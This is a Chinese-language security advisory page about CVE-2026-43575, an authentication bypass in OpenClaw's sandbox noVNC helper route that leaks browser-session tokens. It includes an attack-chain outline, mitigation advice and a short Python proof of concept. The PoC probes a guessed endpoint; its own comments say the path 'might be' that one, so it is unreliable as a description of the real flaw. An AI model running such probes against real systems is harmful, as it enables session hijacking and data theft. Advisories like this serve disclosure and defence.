IPBUF安全漏洞报告
English
CVE-2026-43575 CVSS 9.8 严重

CVE-2026-43575 OpenClaw认证绕过漏洞

披露日期: 2026-05-06

漏洞信息

漏洞编号
CVE-2026-43575
漏洞类型
认证绕过
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

认证绕过OpenClawnoVNC严重漏洞远程代码执行

漏洞概述

OpenClaw在2026.2.21至2026.4.10之前的版本中,存在严重的认证绕过漏洞。该漏洞源于沙箱环境下的noVNC辅助路由未正确实施访问控制。攻击者无需通过网桥认证,即可直接访问该路由。成功利用此漏洞将导致交互式浏览器会话凭证泄露,使攻击者能够接管用户会话。由于漏洞利用无需用户交互且攻击复杂度低,其对系统的机密性、完整性和可用性构成极高威胁。

技术细节

该漏洞的核心在于OpenClaw沙箱组件中的noVNC辅助路由缺少必要的身份验证逻辑。在正常流程中,访问交互式浏览器会话需要通过网桥层进行严格的权限校验。然而,受影响版本在特定API路径上存在逻辑缺陷,允许攻击者绕过这一检查。攻击者只需向目标服务器发送构造好的HTTP请求,即可获取当前活跃的noVNC会话令牌。一旦获取凭证,攻击者便能直接连接到受害者的浏览器会话,执行任意JavaScript代码、窃取Cookie或进行内网横向移动。鉴于CVSS v3.1评分为9.8,属于严重级别漏洞,且利用条件极低(无需权限、无需交互),建议用户优先处理。

攻击链分析

STEP 1
侦察
攻击者识别互联网上暴露的OpenClaw实例,确定其版本在受影响范围内(2026.2.21至2026.4.10之前)。
STEP 2
漏洞利用
攻击者向目标服务器的沙箱noVNC辅助路由发送未经认证的恶意HTTP请求。
STEP 3
权限提升
由于存在认证绕过,服务器返回交互式浏览器会话的凭证或令牌。
STEP 4
数据窃取与控制
攻击者利用获取的凭证接管受害者的浏览器会话,窃取敏感数据或执行恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_openclaw(target_url): """ PoC for CVE-2026-43575: Authentication Bypass in OpenClaw noVNC Helper Route. This script attempts to access the sandbox noVNC helper route without authentication. """ # The vulnerable endpoint might be something like /sandbox/novnc_helper # Based on the description, this route exposes session credentials. endpoint = f"{target_url}/sandbox/novnc_helper" try: # Send a GET request without authentication headers response = requests.get(endpoint, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Authentication bypassed.") print("[+] Response content:") print(response.text) else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://127.0.0.1:8080" # Replace with actual target exploit_openclaw(target)

影响范围

OpenClaw 2026.2.21 至 2026.4.10 之前版本

防御指南

临时缓解措施
建议立即升级至修复版本。如果无法立即升级,应在网络防火墙层面阻断对外部IP开放受影响端口的访问,或暂时禁用沙箱noVNC功能,直到补丁应用完成。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表